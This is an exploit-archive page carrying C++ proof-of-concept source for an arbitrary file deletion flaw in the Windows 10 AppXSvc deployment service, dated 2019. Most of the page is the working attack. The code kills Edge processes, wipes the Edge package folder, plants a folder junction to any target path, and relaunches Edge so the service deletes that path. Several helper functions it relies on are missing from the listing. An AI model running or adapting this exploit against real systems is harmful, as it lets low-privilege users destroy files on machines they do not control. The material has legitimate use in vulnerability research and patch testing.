Microsoft windows 10 appxsvc deployment service arbitrary file deletion Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-08-14 |
Type : local |
Platform : windows
[+] Code ...
/*
# Author : Abdelhamid Naceri
# Discovered On : 13/08/2019
# Description : An Elevation Of Privileges Exist when the microsoft AppXSvc
Deployment Service Cannot Properly Handle The Folder Junction lead to an arbitrary file deletion
from a low integrity user .
# Still Unpatched On 13/08/2019
Here Is A Demo Video https://youtu.be/jqYwMcNvTtM
*/
#include"windows.h"
#include"iostream"
#include"conio.h"
#include"stdio.h"
#include"tlhelp32.h"
#include"cstdio"
#include"wchar.h"
#include"process.h"
#include"wchar.h"
#include"string"
#include"tchar.h"
void exploit(const char* path) {
//Inintializing the variable before begining
int attempt = 0;
string command;
wchar_t* userprofile = _wgetenv(L"USERPROFILE");
const wchar_t* relpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe");
//I created roaming path variable because sometime when i try to wipe ms-edge folder he deny the access so as a solution
//I deleted him first
const wchar_t* roamingpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState");
wstring froamingpath(userprofile);
froamingpath += wstring(roamingpath);
wstring fullpath(userprofile);
fullpath += std::wstring(relpath);
wchar_t* szBuffsrc = (wchar_t*)fullpath.c_str();
wstring fpath(szBuffsrc);
string strfpath(fpath.begin(), fpath.end());
//Check If MS-Edge Need To Write DACL Or Not
if (dirExists(strfpath) != true) {
printf("[!] Wait MS-Edge Need To Write The DACL");
StartEdge();
for (;;) {
Sleep(1000);
if (IsProcessRunning(L"MicrosoftEdge.exe") == true) { break; }
}
StartEdge();
Sleep(7000);
KillEdge();
printf("\r ");
}
//End Of Check
printf("\r# Author : Abdelhamid Naceri\n");
printf("# Tested On Windows 10 32&64bit\n");
printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
printf("[+] Checking If Path Exist ...");
Sleep(2000);
if (dirExists(path) != true) {
printf("Your Path Is Invalid");
ExitProcess(EXIT_FAILURE); }
else {
printf("Exist !\n");
KillEdge();
printf("[+] Starting MS-Edge ...\n");
StartEdge();
Sleep(4000);
printf("[+] Killing MS-Edge ...\n");
KillEdge();
Sleep(3000);
printf("[+] Wipping MS-Edge Directory ...\n");
killProcessByName(L"dllhost.exe");//I Kill This Process Because Somethime He Lock The Files
remove_dir(roamingpath);
remove_dir(szBuffsrc);
Sleep(2000);
remove_dir(szBuffsrc);
printf("[+] Checking If Directory Exist Anymore ...");
if (dirExists(strfpath) == true) {
if (dirExists(strfpath) == true) {
printf("Something Went Wrong");
printf("\n[!] You Should Delete The Files YourSelf Press Anything To Continue");
command = "explorer ";
command.append(strfpath);
system(command.c_str());
_getch();
goto Continue;
}
}
else {
Continue:
printf(" Done\n");
Sleep(3000);
printf("[+] Attempting to Create Junction To Target ...\n");
command = "mklink /J ";
command.append("\"");
command.append(strfpath);
command.append("\"");
command.append(" ");
command.append("\"");
command.append(path);
command.append("\"");
system(command.c_str());
printf("Done\n");
Sleep(3000);
printf("[+] Firing Up MS-Edge Again ...\n");
StartEdge();
do { Sleep(1000); } while (IsProcessRunning(L"MicrosoftEdge.exe"));
Sleep(3000);
StartEdge();
command = "explorer ";
command.append(path);
printf("[!] If The Exploit Done , MS AppXSvc Will Wipe The Target Path\n");
system(command.c_str());
printf("[!] We Will Open Explorer In The Target Check Your Files If The File Deleted Press Anything To Clear The Exploit Files...\n");
_getch();
printf("Cleaning ...");
_wremove(szBuffsrc);
_wrmdir(szBuffsrc);
ExitProcess(EXIT_SUCCESS);
}
}
}
int main(int argc, char* argv[]) {
if (argc == 2) {exploit(argv[1]);}
else {
printf("# Author : Abdelhamid Naceri\n");
printf("# Tested On Windows 10 1903 32&64bit\n");
printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
printf("[!] Usage : poc.exe TargetPath");
}
return EXIT_SUCCESS;
}
Microsoft windows 10 appxsvc deployment service arbitrary file deletion